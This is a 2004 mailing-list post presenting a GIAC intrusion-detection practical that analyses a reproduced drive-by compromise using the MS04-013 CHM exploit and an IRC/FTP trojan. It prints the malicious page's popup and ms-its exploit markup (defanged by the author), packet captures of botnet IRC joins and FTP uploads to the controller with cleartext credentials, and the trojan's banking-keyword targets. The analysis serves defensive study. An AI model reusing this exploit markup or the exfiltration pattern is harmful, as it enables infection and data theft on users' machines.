
LOGS: GIAC GCIA Version 3.4 Practical Detect Alva Lease 'Skip' Duckwall IV: msg#00077

security.intrusions

Subject: LOGS: GIAC GCIA Version 3.4 Practical Detect Alva Lease 'Skip' Duckwall IV


This is my second attempt at sending this to the list. Hopefully it will
go better than the first attempt....

Anyway, my name is Alva Lease 'Skip' Duckwall and here is my first detect
writeup. Feel free to comment and abuse it as you see fit ;-)

Alva Lease 'Skip' Duckwall IV
CISSP, RHCE, SCSA
---------------------------------------------

1. Source of trace

These detects were captured on a stealth interface connected to a hub.
The DSL modem network port for my home network is also plugged into
that hub so all traffic in and out of the DSL modem was captured.

These traces were captured using 'tcpdump -w (filename) -s0'.

2. Detect was generated by:

This is a reproduction of a compromise that occurred on the network at
work. For various reasons, I was not allowed to use the log data
gathered from work for this detect, so I did the next best thing,
reproduce it as best I could from home under well-controlled
circumstances. It should be noted that I only proceeded with the home
network option after it was determined that my workplace wasn't going
to take any legal action against the site(s) in question.

Predicated on the above information, I consider this to be a 'lab
generated' detect even though the practical assignment states "It must
be stressed that our definition of a lab generated detect means detects
generated and obtained from completely separated and non-Internet
connected systems." My VMWARE environment was connected to the
Internet so I could capture the entire attack as part of the
reproduction.

A little history: We were alerted to a problem with the host in
question when a signature fired that detected attempts to join an IRC
server on the Internet. Further investigation of this event indicated
that the host in question was attempting to sign into the remote server
with an IRC nickname of "X-bot17234-29327" where the numbers between
the 'X-bot' portion of the nickname and the dash changed, while the
numbers after the dash did not. The compromised machine would also
transmit files via FTP to the master server. Furthermore, the machine
in question would try to connect to the IRC channel and FTP files every
30 minutes with a high degree of accuracy (within 3 seconds). Further
explanation will be discussed in the 'attack mechanism' portion of this
analysis.

After a thorough examination of all logs available to me as well as all
IDS events for the machine in question, the method used to compromise
the machine was discovered. I then replicated the event at home and
captured all the packets after it was determined that no legal action
was to be taken against any of the participants.

Both of the servers had been taken offline.

3. Probability source address was spoofed:

The source addresses were not spoofed, since all of the traffic was TCP
and complete sessions were established. However, I believe that both of
the hosts involved were compromised.

4. Description of the attack

This attack has two major components. The first component is an
exploit of the bug described in MS04-013 (as well as CAN-2004-0380)
which allows the second exploit to be downloaded and executed without
user intervention. The second exploit uses a carefully crafted
Microsoft Compressed Help Manual (CHM file) to execute arbitrary code.
This combination of attacks is popular in many phishing attacks (see
correlations) and in some extreme examples, like the one I provide, it
can lead to compromise of the machine being attacked.

The basic timeline of events is as follows:

1) The user visits an untrusted (or possibly hacked) website which will
open a popup window with the first set of exploit code in it.
2) The first exploit (MS04-013/CAN-2004-0380) downloads the hostile CHM
code to the local machine.
3) The hostile CHM code is executed which will then download the trojan
components.
4) The trojan components are then installed and begin to execute.


5. Attack mechanism

The website that appeared in a popup window was www.news-distributor.com.

This is the index page from this site:

" <html> <body> <script> var
oWin=window.open("msits.html","Child","width=50, height=50,
screenX,left=5000, screenY,top=5000, menubar=no"); </script> <IMG
src="http://216.55.161.45/cgi-bin/stats/PageStat.pl"; WIDTH="1"
HEIGHT="1">
</body> "

This page opens the http://www.news-distributor.com/msits.html page in
yet another popup window. It also runs a CGI script that is possibly
used to track information about the users visiting this page.

The contents of http://www.news-distributor.com/msits.html (Please note
that the exploit has been obfuscated to prevent detection by any
antivirus software. It WILL NOT work in its current form.)

" <html> <body onUnload='confirm("Do you want to close this window?")'>
<script> self.moveTo(5000,5000); </script><object data="ms-
its(colon)mhtml(colon)file(colon)//C(colon)\\MAIN.MHT(bang)http://www.n
ews-distributor.com(slash)(slash)main.chm(colon)(colon)/main.htm"
type="text/x-scriptlet"></object> </body> </html> "

This code exploits the vulnerability described in MS04-013/CAN-2004-0380
to download and execute the chm file at
http://www.news-distributor.com/main.chm.

According to the network detects, the following files were downloaded
from 216.55.161.45: svchost.ini, SVCHOST.EXE, dlcomcnf.exe, url.txt,
and title.txt.

SVCHOST.EXE is the trojan. A quick look at the binary shows that it
was compressed with UPX. Further examination of the uncompressed
binary yielded references to it acting as a SOCKS proxy. There was
also a reference to a slightly different pagestat.pl url named
pagestat2.pl. Perhaps this second cgi script was put there to gather
some sort of statistics as to the success rate of infection. As of this
writing no major antivirus or anti-spyware software was able to
identify it. A sample was submitted to Symantec and McAfee.

svchost.ini is the control file for the trojan. The control file
contains encrypted statements. More than likely it contains the
information needed to log into the IRC server and the FTP server.

dlcomcnf.exe is a self extracting archive that contains a DLL.

Two text files, url.txt and title.txt, contain URLs and title keywords
that the trojan looks for. Examples contained in url.txt are
‘dallasfed.org’, ‘ml.com’, and ‘jpmorgan.com’. Examples from title.txt
are ‘bank’, ‘money’, ‘mail’, and ‘log’.

The following detect shows communication from the VMWARE box to
216.55.161.45 on TCP port 34902. This appears to be IRC traffic. I
have not shown any of the channel listings since it would give away the
names and IP addresses of compromised machines. The address has been
obfuscated and the checksums have been changed.

23:12:47.847453 IP 10.10.10.138.1106 > 216.55.161.45.34902: S
3639828070:3639828070(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
23:12:47.924763 IP 216.55.161.45.34902 > 10.10.10.138.1106: S
4063190951:4063190951(0) ack 3639828071 win 5840 <mss
1460,nop,nop,sackOK> (DF)
23:12:47.925046 IP 10.10.10.138.1106 > 216.55.161.45.34902: . ack 1
win 17520 (DF)
23:12:48.937192 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 1:23(22)
ack 1 win 17520 (DF)
0x0000 4500 003e 0409 4000 8006 f6b0 0a0a 0a8a E..>..@.....E.A.
0x0010 d837 a12d 0452 8856 d8f3 5e67 f22f 5fa8 .7.-.R.V..^g./_.
0x0020 5018 4470 f283 0000 4e49 434b 2058 2d62 P.Dp....NICK.X-b
0x0030 6f74 3939 3238 2d35 3939 3539 0d0a ot9928-59959..
23:12:49.010010 IP 216.55.161.45.34902 > 10.10.10.138.1106: . ack 23
win 5840 (DF)

Here the IRC nickname is set to X-bot9928-59959. It is worth noting
that port 59959 was listening on the machine; it might be a SOCKS
proxy, since there are references to SOCKS in the binary.

23:12:49.010583 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 23:82(59)
ack 1 win 17520 (DF)
0x0000 4500 0063 040a 4000 8006 f68a 0a0a 0a8a E..c..@.....E.A.
0x0010 d837 a12d 0452 8856 d8f3 5e7d f22f 5fa8 .7.-.R.V..^}./_.
0x0020 5018 4470 3258 0000 5553 4552 204a 6262 P.Dp2X..USER.Jbb
0x0030 3467 3639 3932 3841 3120 4855 4748 2d38 4g69928A1.HUGH-8
0x0040 4e31 4a41 4a59 4255 5920 7365 7276 6572 N1JAJYBUY.server
0x0050 203a 582d 626f 7439 3932 382d 3539 3935 .:X-bot9928-5995
0x0060 390d 0a 9..

Perhaps N1JAJYBUY is somebody's name?

23:12:49.086404 IP 216.55.161.45.34902 > 10.10.10.138.1106: . ack 82
win 5840 (DF)
23:12:49.203219 IP 216.55.161.45.34902 > 10.10.10.138.1106: P
1:1067(1066) ack 82 win 5840 (DF)
0x0000 4500 0452 6bca 4000 3706 d3db d837 a12d E..Rk.@.7....7.-
0x0010 0a0a 0a8a 8856 0452 f22f 5fa8 d8f3 5eb8 E.A..V.R./_...^.
0x0020 5018 16d0 2a84 0000 3a73 6572 7665 722e P...*...:server.
0x0030 6461 6c2e 6e65 7420 3030 3120 582d 626f dal.net.001.X-bo
0x0040 7439 3932 382d 3539 3935 3920 3a57 656c t9928-59959.:Wel
0x0050 636f 6d65 2074 6f20 7468 6520 496e 7465 come.to.the.Inte
0x0060 726e 6574 2052 656c 6179 204e 6574 776f rnet.Relay.Netwo
0x0070 726b 2058 2d62 6f74 3939 3238 2d35 3939 rk.X-bot9928-599
0x0080 3539 215e 4a62 6234 6736 3939 3240 6464 59!^Jbb4g6992@dd
0x0090 6464 6464 6464 6464 6464 6464 2e64 6464 dddddddddddd.ddd
0x00a0 642e 6464 642e 6464 6464 6464 6464 642e d.ddd.ddddddddd.
0x00b0 6464 640d 0a3a 7365 7276 6572 2e64 616c ddd..:server.dal
0x00c0 2e6e 6574 2030 3032 2058 2d62 6f74 3939 .net.002.X-bot99
0x00d0 3238 2d35 3939 3539 203a 596f 7572 2068 28-59959.:Your.h
0x00e0 6f73 7420 6973 2073 6572 7665 722e 6461 ost.is.server.da
0x00f0 6c2e 6e65 742c 2072 756e 6e69 6e67 2052 l.net,.running.R
0x0100 7573 4e65 742d 312e 342e 3270 7265 5f31 usNet-1.4.2pre_1
0x0110 3620 286f 7269 672e 2032 2e31 302e 3370 6.(orig..2.10.3p
0x0120 3529 0d0a 3a73 6572 7665 722e 6461 6c2e 5)..:server.dal.
0x0130 6e65 7420 3030 3320 582d 626f 7439 3932 net.003.X-bot992
0x0140 382d 3539 3935 3920 3a54 6869 7320 7365 8-59959.:This.se
0x0150 7276 6572 2077 6173 2063 7265 6174 6564 rver.was.created
0x0160 2054 7565 204d 6172 2032 2032 3030 3420 .Tue.Mar.2.2004.
0x0170 6174 2032 313a 3530 3a31 3020 5053 540d at.21:50:10.PST.
0x0180 0a3a 7365 7276 6572 2e64 616c 2e6e 6574 .:server.dal.net
0x0190 2030 3034 2058 2d62 6f74 3939 3238 2d35 .004.X-bot9928-5
0x01a0 3939 3539 2073 6572 7665 722e 6461 6c2e 9959.server.dal.
0x01b0 6e65 7420 322e 3130 2e33 7035 2061 6f4f net.2.10.3p5.aoO
0x01c0 6972 7778 2061 6263 6569 496b 6c6d 6e6f irwx.abceiIklmno
0x01d0 4f70 7172 7374 767a 0d0a 3a73 6572 7665 Opqrstvz..:serve
0x01e0 722e 6461 6c2e 6e65 7420 3030 3520 582d r.dal.net.005.X-
0x01f0 626f 7439 3932 382d 3539 3935 3920 5052 bot9928-59959.PR
0x0200 4546 4958 3d28 6f76 2940 2b20 4d4f 4445 EFIX=(ov)@+.MODE
0x0210 533d 3320 4348 414e 5459 5045 533d 2326 S=3.CHANTYPES=#&
0x0220 212b 204d 4158 4348 414e 4e45 4c53 3d31 !+.MAXCHANNELS=1
0x0230 3020 4e49 434b 4c45 4e3d 3331 2054 4f50 0.NICKLEN=31.TOP
0x0240 4943 4c45 4e3d 3235 3520 4b49 434b 4c45 ICLEN=255.KICKLE
0x0250 4e3d 3235 3520 4e45 5457 4f52 4b3d 5275 N=255.NETWORK=Ru
0x0260 734e 6574 2043 4841 4e4d 4f44 4553 3d62 sNet.CHANMODES=b
0x0270 6549 2c6b 2c6c 2c61 6369 6d6e 7073 7274 eI,k,l,acimnpsrt
0x0280 7a20 3a61 7265 2073 7570 706f 7274 6564 z.:are.supported
0x0290 2062 7920 7468 6973 2073 6572 7665 720d .by.this.server.
0x02a0 0a3a 7365 7276 6572 2e64 616c 2e6e 6574 .:server.dal.net
0x02b0 2032 3531 2058 2d62 6f74 3939 3238 2d35 .251.X-bot9928-5
0x02c0 3939 3539 203a 5468 6572 6520 6172 6520 9959.:There.are.
0x02d0 3930 3620 7573 6572 7320 616e 6420 3020 906.users.and.0.
0x02e0 7365 7276 6963 6573 206f 6e20 3120 7365 services.on.1.se
0x02f0 7276 6572 730d 0a3a 7365 7276 6572 2e64 rvers..:server.d
0x0300 616c 2e6e 6574 2032 3533 2058 2d62 6f74 al.net.253.X-bot
0x0310 3939 3238 2d35 3939 3539 2034 203a 756e 9928-59959.4.:un
0x0320 6b6e 6f77 6e20 636f 6e6e 6563 7469 6f6e known.connection
0x0330 730d 0a3a 7365 7276 6572 2e64 616c 2e6e s..:server.dal.n
0x0340 6574 2032 3534 2058 2d62 6f74 3939 3238 et.254.X-bot9928
0x0350 2d35 3939 3539 2031 3320 3a63 6861 6e6e -59959.13.:chann
0x0360 656c 7320 666f 726d 6564 0d0a 3a73 6572 els.formed..:ser
0x0370 7665 722e 6461 6c2e 6e65 7420 3235 3520 ver.dal.net.255.
0x0380 582d 626f 7439 3932 382d 3539 3935 3920 X-bot9928-59959.
0x0390 3a49 2068 6176 6520 3930 3620 7573 6572 :I.have.906.user
0x03a0 732c 2030 2073 6572 7669 6365 7320 616e s,.0.services.an
0x03b0 6420 3020 7365 7276 6572 730d 0a3a 7365 d.0.servers..:se
0x03c0 7276 6572 2e64 616c 2e6e 6574 2032 3635 rver.dal.net.265
0x03d0 2058 2d62 6f74 3939 3238 2d35 3939 3539 .X-bot9928-59959
0x03e0 203a 4375 7272 656e 7420 6c6f 6361 6c20 .:Current.local.
0x03f0 7573 6572 733a 2039 3036 2020 4d61 783a users:.906..Max:
0x0400 2031 3037 300d 0a3a 7365 7276 6572 2e64 .1070..:server.d
0x0410 616c 2e6e 6574 2032 3636 2058 2d62 6f74 al.net.266.X-bot
0x0420 3939 3238 2d35 3939 3539 203a 4375 7272 9928-59959.:Curr
0x0430 656e 7420 676c 6f62 616c 2075 7365 7273 ent.global.users
0x0440 3a20 3930 3620 204d 6178 3a20 3130 3730 :.906..Max:.1070
0x0450 0d0a ..

This section says that there are 906 users on the system out of 1070.
This seems to indicate that there are at least 900 machines that are
infected with this trojan. Further analysis of the channel seems to
bear this out. I'm not including this channel information because it
contains IP addresses and the SOCKS port information.

23:12:49.290751 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 82:99(17)
ack 1067 win 16454 (DF)
0x0000 4500 0039 040c 4000 8006 f6b2 0a0a 0a8a E..9..@.....E.A.
0x0010 d837 a12d 0452 8856 d8f3 5eb8 f22f 63d2 .7.-.R.V..^../c.
0x0020 5018 4046 ab73 0000 4a4f 494e 203a 2373 P.@F.s..JOIN.:#s
0x0030 7570 6572 746f 790d 0a upertoy..

The channel name is #supertoy. Perhaps this is the name of the trojan.

Here is some of the FTP traffic. Please note that this traffic was
captured before the previous IRC traffic. This traffic is presented
out of order because I felt it was better to present the IRC traffic
first.

22:28:09.964008 10.10.10.138.3604 > 216.55.161.45.ftp: S
535955192:535955192(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)

22:28:10.038087 216.55.161.45.ftp > 10.10.10.138.3604: S
3993608827:3993608827(0) ack 535955193 win 5840 <mss
1460,nop,nop,sackOK>

22:28:10.038414 10.10.10.138.3604 > 216.55.161.45.ftp: . ack 1 win
64240 (DF)

22:28:10.113441 216.55.161.45.ftp > 10.10.10.138.3604: P 1:21(20) ack 1
win 5840 (DF)

22:28:10.114372 10.10.10.138.3604 > 216.55.161.45.ftp: P 1:14(13) ack
21 win 64220 (DF)
0x0000 4500 0035 4f1a 4000 8006 aba8 0a0a 0a8a E..5O.@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 06f9 ee09 a290 .7.-............
0x0020 5018 fadc f155 0000 5553 4552 2061 7061 P....U..USER.apa
0x0030 6368 650d 0a che..

The username is apache. He probably logs directly into the webroot of
the machine.

22:28:10.187860 216.55.161.45.ftp > 10.10.10.138.3604: . ack 14 win
5840 (DF)

22:28:10.190064 216.55.161.45.ftp > 10.10.10.138.3604: P 21:55(34) ack
14 win 5840 (DF)
0x0000 4500 004a 70c6 4000 3706 d2e7 d837 a12d E..Jp.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a290 1ff2 0706 E.A.............
0x0020 5018 16d0 8bfd 0000 3333 3120 506c 6561 P.......331.Plea
0x0030 7365 2073 7065 6369 6679 2074 6865 2070 se.specify.the.p
0x0040 6173 7377 6f72 642e 0d0a assword...

22:28:10.190827 10.10.10.138.3604 > 216.55.161.45.ftp: P 14:31(17) ack
55 win 64186 (DF)
0x0000 4500 0039 4f1e 4000 8006 aba0 0a0a 0a8a E..9O.@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 0706 ee09 a2b2 .7.-............
0x0020 5018 faba 62ed 0000 5041 5353 204d 6e37 P...b...PASS.Mn7
0x0030 507a 3431 5f63 6c0d 0a Pz41_cl..

A password of “Mn7Pz41_cl”. I wish I could get my users to use such a
secure password. Of course it doesn’t help that it was sent in clear
text. ;-)

22:28:10.268202 216.55.161.45.ftp > 10.10.10.138.3604: P 55:88(33) ack
31 win 5840 (DF)
0x0000 4500 0049 70c7 4000 3706 d2e7 d837 a12d E..Ip.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a2b2 1ff2 0717 E.A.............
0x0020 5018 16d0 6eb8 0000 3233 3020 4c6f 6769 P...n...230.Logi
0x0030 6e20 7375 6363 6573 7366 756c 2e20 4861 n.successful..Ha
0x0040 7665 2066 756e 2e0d 0a ve.fun...

22:28:10.269584 10.10.10.138.3604 > 216.55.161.45.ftp: P 31:44(13) ack
88 win 64153 (DF)
0x0000 4500 0035 4f22 4000 8006 aba0 0a0a 0a8a E..5O"@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 0717 ee09 a2d3 .7.-............
0x0020 5018 fa99 8359 0000 4d4b 4420 746f 796c P....Y..MKD.toyl
0x0030 6f67 730d 0a ogs..

22:28:10.344596 216.55.161.45.ftp > 10.10.10.138.3604: P 88:128(40) ack
44 win 5840 (DF)
0x0000 4500 0050 70c8 4000 3706 d2df d837 a12d E..Pp.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a2d3 1ff2 0724 E.A............$
0x0020 5018 16d0 338b 0000 3535 3020 4372 6561 P...3...550.Crea
0x0030 7465 2064 6972 6563 746f 7279 206f 7065 te.directory.ope
0x0040 7261 7469 6f6e 2066 6169 6c65 642e 0d0a ration.failed...

22:28:10.345424 10.10.10.138.3604 > 216.55.161.45.ftp: P 44:57(13) ack
128 win 64113 (DF)
0x0000 4500 0035 4f26 4000 8006 ab9c 0a0a 0a8a E..5O&@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 0724 ee09 a2fb .7.-.......$....
0x0020 5018 fa71 8d40 0000 4357 4420 746f 796c P..q.@..CWD.toyl
0x0030 6f67 730d 0a ogs..

22:28:10.419245 216.55.161.45.ftp > 10.10.10.138.3604: P 128:165(37)
ack 57 win 5840 (DF)
0x0000 4500 004d 70c9 4000 3706 d2e1 d837 a12d E..Mp.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a2fb 1ff2 0731 E.A............1
0x0020 5018 16d0 4724 0000 3235 3020 4469 7265 P...G$..250.Dire
0x0030 6374 6f72 7920 7375 6363 6573 7366 756c ctory.successful
0x0040 6c79 2063 6861 6e67 6564 2e0d 0a ly.changed...

It attempts to make a directory called ‘toylogs’. Perhaps supertoy is
the name of the trojan after all. The directory creation failed
because it already existed.

22:28:10.420113 10.10.10.138.3604 > 216.55.161.45.ftp: P 57:73(16) ack
165 win 64076 (DF)
0x0000 4500 0038 4f2a 4000 8006 ab95 0a0a 0a8a E..8O*@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 0731 ee09 a320 .7.-.......1....
0x0020 5018 fa4c 5c8a 0000 4d4b 4420 3037 2d30 P..L\...MKD.07-0
0x0030 342d 3230 3034 0d0a 4-2004..

22:28:10.494411 216.55.161.45.ftp > 10.10.10.138.3604: P 165:205(40)
ack 73 win 5840 (DF)
0x0000 4500 0050 70ca 4000 3706 d2dd d837 a12d E..Pp.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a320 1ff2 0741 E.A............A
0x0020 5018 16d0 3321 0000 3535 3020 4372 6561 P...3!..550.Crea
0x0030 7465 2064 6972 6563 746f 7279 206f 7065 te.directory.ope
0x0040 7261 7469 6f6e 2066 6169 6c65 642e 0d0a ration.failed...

22:28:10.495175 10.10.10.138.3604 > 216.55.161.45.ftp: P 73:89(16) ack
205 win 64036 (DF)
0x0000 4500 0038 4f2e 4000 8006 ab91 0a0a 0a8a E..8O.@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 0741 ee09 a348 .7.-.......A...H
0x0020 5018 fa24 666e 0000 4357 4420 3037 2d30 P..$fn..CWD.07-0
0x0030 342d 3230 3034 0d0a 4-2004..

22:28:10.569571 216.55.161.45.ftp > 10.10.10.138.3604: P 205:242(37)
ack 89 win 5840 (DF)
0x0000 4500 004d 70cb 4000 3706 d2df d837 a12d E..Mp.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a348 1ff2 0751 E.A........H...Q
0x0020 5018 16d0 46b7 0000 3235 3020 4469 7265 P...F...250.Dire
0x0030 6374 6f72 7920 7375 6363 6573 7366 756c ctory.successful
0x0040 6c79 2063 6861 6e67 6564 2e0d 0a ly.changed...

It tries to create a directory called ‘07-04-2004’, i.e. April 7, 2004.
The directory creation again fails because it already exists. This is
the date on which I ran and gathered these detects.

22:28:10.570516 10.10.10.138.3604 > 216.55.161.45.ftp: P 89:130(41) ack
242 win 63999 (DF)
0x0000 4500 0051 4f32 4000 8006 ab74 0a0a 0a8a E..QO2@....tE.A.
0x0010 d837 a12d 0e14 0015 1ff2 0751 ee09 a36d .7.-.......Q...m
0x0020 5018 f9ff 7173 0000 4d4b 4420 3030 4544 P...qs..MKD.00ED
0x0030 4331 3143 2d38 4132 382d 3436 3146 2d42 C11C-8A28-461F-B
0x0040 4533 3033 3344 4331 3442 3431 3545 350d E3033DC14B415E5.
0x0050 0a .

22:28:10.646047 216.55.161.45.ftp > 10.10.10.138.3604: P 242:313(71)
ack 130 win 5840 (DF)
0x0000 4500 006f 70cc 4000 3706 d2bc d837 a12d E..op.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a36d 1ff2 077a E.A........m...z
0x0020 5018 16d0 b16f 0000 3235 3720 222f 746f P....o..257."/to
0x0030 796c 6f67 732f 3037 2d30 342d 3230 3034 ylogs/07-04-2004
0x0040 2f30 3045 4443 3131 432d 3841 3238 2d34 /00EDC11C-8A28-4
0x0050 3631 462d 4245 3330 3333 4443 3134 4234 61F-BE3033DC14B4
0x0060 3135 4535 2220 6372 6561 7465 640d 0a 15E5".created..

22:28:10.647366 10.10.10.138.3604 > 216.55.161.45.ftp: P 130:171(41)
ack 313 win 63928 (DF)
0x0000 4500 0051 4f36 4000 8006 ab70 0a0a 0a8a E..QO6@....pE.A.
0x0010 d837 a12d 0e14 0015 1ff2 077a ee09 a3b4 .7.-.......z....
0x0020 5018 f9b8 7b3e 0000 4357 4420 3030 4544 P...{>..CWD.00ED
0x0030 4331 3143 2d38 4132 382d 3436 3146 2d42 C11C-8A28-461F-B
0x0040 4533 3033 3344 4331 3442 3431 3545 350d E3033DC14B415E5.
0x0050 0a .

22:28:10.722601 216.55.161.45.ftp > 10.10.10.138.3604: P 313:350(37)
ack 171 win 5840 (DF)
0x0000 4500 004d 70cd 4000 3706 d2dd d837 a12d E..Mp.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a3b4 1ff2 07a3 E.A.............
0x0020 5018 16d0 45f9 0000 3235 3020 4469 7265 P...E...250.Dire
0x0030 6374 6f72 7920 7375 6363 6573 7366 756c ctory.successful
0x0040 6c79 2063 6861 6e67 6564 2e0d 0a ly.changed...

It was successful at creating a directory called
‘00EDC11C-8A28-461F-BE3033DC14B415E5’. This appears to be some sort of
unique identifier. I could not find it in a registry search, so I don’t
know how it is generated.


22:28:10.723883 10.10.10.138.3604 > 216.55.161.45.ftp: P 171:179(8) ack
350 win 63891 (DF)
0x0000 4500 0030 4f3a 4000 8006 ab8d 0a0a 0a8a E..0O:@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 07a3 ee09 a3d9 .7.-............
0x0020 5018 f993 1c9d 0000 5459 5045 2049 0d0a P.......TYPE.I..

22:28:10.797750 216.55.161.45.ftp > 10.10.10.138.3604: P 350:381(31)
ack 179 win 5840 (DF)
0x0000 4500 0047 70ce 4000 3706 d2e2 d837 a12d E..Gp.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a3d9 1ff2 07ab E.A.............
0x0020 5018 16d0 9b6b 0000 3230 3020 5377 6974 P....k..200.Swit
0x0030 6368 696e 6720 746f 2042 696e 6172 7920 ching.to.Binary.
0x0040 6d6f 6465 2e0d 0a mode...

22:28:10.798944 10.10.10.138.3604 > 216.55.161.45.ftp: P 179:185(6) ack
381 win 63860 (DF)
0x0000 4500 002e 4f3e 4000 8006 ab8b 0a0a 0a8a E...O>@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 07ab ee09 a3f8 .7.-............
0x0020 5018 f974 3de7 0000 5041 5356 0d0a P..t=...PASV..

22:28:10.872987 216.55.161.45.ftp > 10.10.10.138.3604: P 381:431(50)
ack 185 win 5840 (DF)
0x0000 4500 005a 70cf 4000 3706 d2ce d837 a12d E..Zp.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a3f8 1ff2 07b1 E.A.............
0x0020 5018 16d0 4377 0000 3232 3720 456e 7465 P...Cw..227.Ente
0x0030 7269 6e67 2050 6173 7369 7665 204d 6f64 ring.Passive.Mod
0x0040 6520 2832 3136 2c35 352c 3136 312c 3435 e.(216,55,161,45
0x0050 2c36 352c 3232 3729 0d0a ,65,227)..

22:28:10.948186 10.10.10.138.3604 > 216.55.161.45.ftp: P 185:215(30)
ack 431 win 63810 (DF)
0x0000 4500 0046 4f44 4000 8006 ab6d 0a0a 0a8a E..FOD@....mE.A.
0x0010 d837 a12d 0e14 0015 1ff2 07b1 ee09 a42a .7.-...........*
0x0020 5018 f942 bae3 0000 5354 4f52 2030 372d P..B....STOR.07-
0x0030 3034 2d32 3030 342d 3135 2d32 332d 3238 04-2004-15-23-28
0x0040 2e74 7874 0d0a .txt..


It uploads a file called 07-04-2004-15-23-28.txt. As previously
mentioned, 07-04-2004 is April 7, 2004. 15-23-28 is the local time
expressed in GMT. The VMWARE machine’s internal clock was set to
Mountain Time, while the capture machine was set to Eastern Time.

22:28:11.022498 216.55.161.45.ftp > 10.10.10.138.3604: P 431:453(22)
ack 215 win 5840 (DF)
0x0000 4500 003e 70d0 4000 3706 d2e9 d837 a12d E..>p.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a42a 1ff2 07cf E.A........*....
0x0020 5018 16d0 be97 0000 3135 3020 4f6b 2074 P.......150.Ok.t
0x0030 6f20 7365 6e64 2064 6174 612e 0d0a o.send.data...

22:28:11.097441 216.55.161.45.ftp > 10.10.10.138.3604: P 453:475(22)
ack 215 win 5840 (DF)
0x0000 4500 003e 70d1 4000 3706 d2e8 d837 a12d E..>p.@.7....7.-
0x0010 0a0a 0a8a 0015 0e14 ee09 a440 1ff2 07cf E.A........@....
0x0020 5018 16d0 db64 0000 3232 3620 4669 6c65 P....d..226.File
0x0030 2072 6563 6569 7665 204f 4b2e 0d0a .receive.OK...

This was all the data that was sent. Apparently it hadn’t collected
anything interesting to send home on my test system.


6. Correlations

The vulnerability information can be found from Microsoft at
http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx.

The CVE for CAN-2004-0380 can be found at
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380

A quick look through the Handler’s diaries at isc.sans.org came up with
a couple of blurbs on hostile chm files. Both
http://isc.sans.org/diary.php?date=2004-04-11 and
http://isc.sans.org/diary.php?date=2004-04-10 mention the hostile
URL/chm files although no in-depth analysis was provided or linked to.

A Google search for ‘supertoy’ and ‘trojan’ yielded references to a
‘W32/Mooder’ trojan from McAfee. However, the description of the
trojan doesn’t match the files that were downloaded and installed.

A Google search for ‘xbot’ and ‘trojan’ yielded a couple of hits. One
on pestpatrol, which has a listing for “Backdoor.IRC.XBot.a” and
another on emsisoft.com which also lists a “Backdoor.IRC.Xbot.a”.
Neither of these contain any detailed information or writeups.

A Google search for ‘main.chm’ and ‘trojan’ yielded several hits
describing phishing emails that were sent out using this file name.
None of the hits seem to describe the trojan presented here. Links
include:
http://www.codephish.info/modules.php?op=modload&name=News&file=article&sid=113
http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=121

A search of the websites for both McAfee and Symantec yielded no
results.

A search of the TrendMicro website yielded a couple of hits but neither
of these IRC bots match the description of what I’ve seen.

7. Evidence of active targeting

There is no evidence of active targeting.

8. Severity

Severity = (criticality + lethality) - (system countermeasures +
network countermeasures)

Criticality:
Since this was a VMWARE box whose sole existence was predicated on
running this trojan, the criticality is 1.

Lethality:
Since this trojan appears to offer remote access to somebody on an IRC
channel, this box is about as owned as it gets. Therefore, the
lethality is a 5.

System Countermeasures:
Since this box didn’t have any updates installed on it or any antivirus
software, its score in this area is a 1.

Network Countermeasures:
There were not any network countermeasures in place. Score a 1 here.

Severity = (1 + 5) - (1 + 1) = 4


9. Defensive recommendation

Always keep the system's patch level up to date. A current patchset
would have prevented the URL from downloading the hostile CHM file and
subsequently prevented the trojan from being installed.

Also, up-to-date antivirus software would have correctly identified the
website as having malicious code on it (verified with both McAfee and
Symantec) and prevented the webpage from working.

Passing all web traffic through an application proxy that was capable
of screening for the hostile CHM URL format would also have prevented
the attack from being successful.

10. Multiple choice Question

Your IDS alerts you that a machine on your network is attempting to FTP
files whose name appears to be some sort of timestamp. Your site
doesn’t have a policy when it comes to transferring files out of your
network. Should you

A) Call the networking group and have the machine disconnected
immediately?
B) Block the destination host at the firewall?
C) Call the system’s owner and verify it is authorized activity?
D) All of the above.

Answer: C. Unless you are absolutely certain that the activity is
hostile, you should call the system’s owner to verify that the activity
is NOT authorized, especially since your site doesn’t have a policy on
the subject. You never know if a machine outside of your control is
supposed to be sending periodic files to a remote server unless you
verify first.

_______________________________________________
Intrusions mailing list
Intrusions@xxxxxxxxxxxxxx
http://www.dshield.org/mailman/listinfo/intrusions
